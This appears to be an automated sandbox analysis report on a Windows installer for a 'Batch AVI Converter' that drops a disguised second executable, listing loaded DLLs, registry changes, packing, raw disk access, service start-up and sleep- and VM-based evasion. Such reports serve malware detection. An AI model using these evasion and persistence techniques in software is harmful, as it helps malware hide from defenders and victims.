        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: rstrtmgr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: explorerframe.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: dsound.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Batch AVI Converter_is1Jump to behavior
        Source: file.exeStatic file information: File size 3488773 > 1048576
        Source: Binary string: msvcp71.pdbx# source: is-0D2S5.tmp.1.dr
        Source: Binary string: msvcr71.pdb< source: is-O4BPT.tmp.1.dr
        Source: Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-7PIOL.tmp.1.dr
        Source: Binary string: msvcp71.pdb source: is-0D2S5.tmp.1.dr
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000002.3334319199.000000000068E000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091477293.0000000003140000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.2091585886.00000000021F8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3334991666.0000000002373000.00000002.00000001.01000000.00000007.sdmp, _isdecmp.dll.1.dr
        Source: Binary string: msvcr71.pdb source: is-O4BPT.tmp.1.dr

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Unpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack .text:ER;_areg_2:R;.data:W;.rsrc:R;_breg_2:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Unpacked PE file: 3.2.batchaviconverter32_64.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
        Source: batchaviconverter32_64.exe.1.dr Static PE information: section name: _areg_2
        Source: batchaviconverter32_64.exe.1.dr Static PE information: section name: _breg_2
        Source: is-FH5VO.tmp.1.dr Static PE information: section name: .eh_fram
        Source: DKIM Authenticator lib 9.11.45.exe.3.dr Static PE information: section name: _areg_2
        Source: DKIM Authenticator lib 9.11.45.exe.3.dr Static PE information: section name: _breg_2
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx 1_2_00494CB1
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx 1_2_0048567D
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx 1_2_00477B09
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx 1_2_0045FD20
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
        Source: batchaviconverter32_64.exe.1.dr Static PE information: section name: .text entropy: 7.758900444364581
        Source: DKIM Authenticator lib 9.11.45.exe.3.dr Static PE information: section name: .text entropy: 7.758900444364581

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D8F7D5
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmp
        Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-9JGQO.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe File created: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp File created: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe File created: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe

        Boot Survival

        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D8F7D5
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_0040B846 StartServiceCtrlDispatcherA,lstrcmpiW, 3_2_0040B846
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus, 1_2_004241DC
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00424194 IsIconic,SetActiveWindow, 1_2_00424194
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418384
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042285C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00417598 IsIconic,GetCapture, 1_2_00417598
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_0048393C
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00417CCE IsIconic,SetWindowPos, 1_2_00417CCE
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CD0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F118
        Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_00401B4B
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_02D8F8D9
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Window / User API: threadDelayed 921
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Window / User API: threadDelayed 8920
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-9JGQO.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dll
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\unins000.exe (copy)
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmp
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dll
        Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5972
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-18538
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140 Thread sleep count: 921 > 30
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140 Thread sleep time: -1842000s >= -30000s
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 4220 Thread sleep count: 79 > 30
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 4220 Thread sleep time: -4740000s >= -30000s
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140 Thread sleep count: 8920 > 30
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe TID: 2140 Thread sleep time: -17840000s >= -30000s
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe File opened: PhysicalDrive0
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Thread delayed: delay time: 60000
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWn
        Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-6769
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe API call chain: ExitProcess graph end node graph_3-18539
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe API call chain: ExitProcess graph end node graph_3-19105
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Process information queried: ProcessInformation
